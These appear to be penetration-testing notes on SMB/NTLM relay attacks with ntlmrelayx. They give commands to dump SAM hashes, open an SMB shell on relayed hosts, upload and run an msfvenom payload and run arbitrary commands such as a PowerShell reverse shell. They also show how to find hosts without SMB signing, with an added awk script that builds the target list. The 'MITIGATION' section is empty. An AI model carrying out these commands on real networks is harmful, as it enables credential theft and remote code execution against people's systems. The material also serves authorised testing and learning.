SMB Relay

python ntlmrelayx.py -tf targets.txt -smb2support >> main command: relays the captured NTLM authentication to every host in targets.txt and dumps the local SAM hashes (only works if the relayed user is a local admin on the target; relaying back to the host the authentication came from does not work, that was patched long ago)

python ntlmrelayx.py -tf targets.txt -smb2support -i >> interactive mode: instead of dumping hashes, spawns an SMB client shell on the target, listening on a local port

>> open a new tab and connect with nc 127.0.0.1 <port> (11000 for the first session, 11001 for the next one, and so on; the port is printed by ntlmrelayx)

shares >> lists the shared folders

use C$ >> switch to a specific share (C$ is the root of the system drive)

use ADMIN$ >> the Windows directory of the target (C:\Windows, not system32; system32 is one level below)

python ntlmrelayx.py -tf targets.txt -smb2support -e run.exe >> uploads and executes a file on the target (run.exe = payload created with msfvenom), then catch the connection with a Metasploit handler

python ntlmrelayx.py -tf targets.txt -smb2support -c "<command>" >> runs a command on the target (for example a PowerShell reverse shell one-liner)

Check for SMB signing (the relay only works against hosts that do not require it):

nmap --script=smb2-security-mode.nse -p445 10.10.10.0/24

add the addresses reported as "Message signing enabled but not required" to a .txt file (this is the targets.txt used above); hosts reported as "enabled and required" (domain controllers by default) cannot be relayed to
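Added example (not from the original notes): a small shell helper that turns the nmap output of the command above into the targets.txt that ntlmrelayx expects. It assumes the scan was saved with `-oN scan.txt`; the nmap output embedded below is constructed to look like real smb2-security-mode results, and the "Message signing disabled" string is matched as well on the assumption that such a host is just as relayable as a "not required" one.

```shell
#!/bin/sh
# Build targets.txt for ntlmrelayx from nmap smb2-security-mode output.
# Added example, not the original page's code.

# Constructed sample output (not a real scan): a DC that requires signing,
# two hosts that do not, and one host with port 445 closed.
sample_nmap_output() {
    cat <<'EOF'
Nmap scan report for dc01.corp.local (10.10.10.1)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Nmap scan report for 10.10.10.5
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.7
Host is up (0.0015s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.9
Host is up (0.0011s latency).

PORT    STATE  SERVICE
445/tcp closed microsoft-ds
EOF
}

# Print one IP per line for every host whose SMB2 signing is not required.
# Reads nmap normal output (-oN file or stdout) from the files given as
# arguments, or from stdin when no argument is given.
relay_targets() {
    awk '
        # Remember the current host. The IP is the last field, either bare
        # ("... for 10.10.10.5") or in parentheses after a hostname.
        /^Nmap scan report for / { ip = $NF; gsub(/[()]/, "", ip) }
        # Emit the host only for the relayable signing states; "enabled and
        # required" matches neither pattern and is skipped.
        /Message signing enabled but not required/ || /Message signing disabled/ { print ip }
    ' "$@"
}

# Real use (assumes the scan was saved with -oN scan.txt):
#   nmap --script=smb2-security-mode.nse -p445 -oN scan.txt 10.10.10.0/24
#   relay_targets scan.txt > targets.txt
#   python ntlmrelayx.py -tf targets.txt -smb2support
# Stand-alone demo on the constructed sample; prints 10.10.10.5 and 10.10.10.7.
sample_nmap_output | relay_targets
```

The filter keys on the host header line rather than on port state, so a host whose 445 is closed never reaches the print branch and a hostname line with the IP in parentheses still yields a bare IP, which is what `-tf` wants.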

MITIGATION
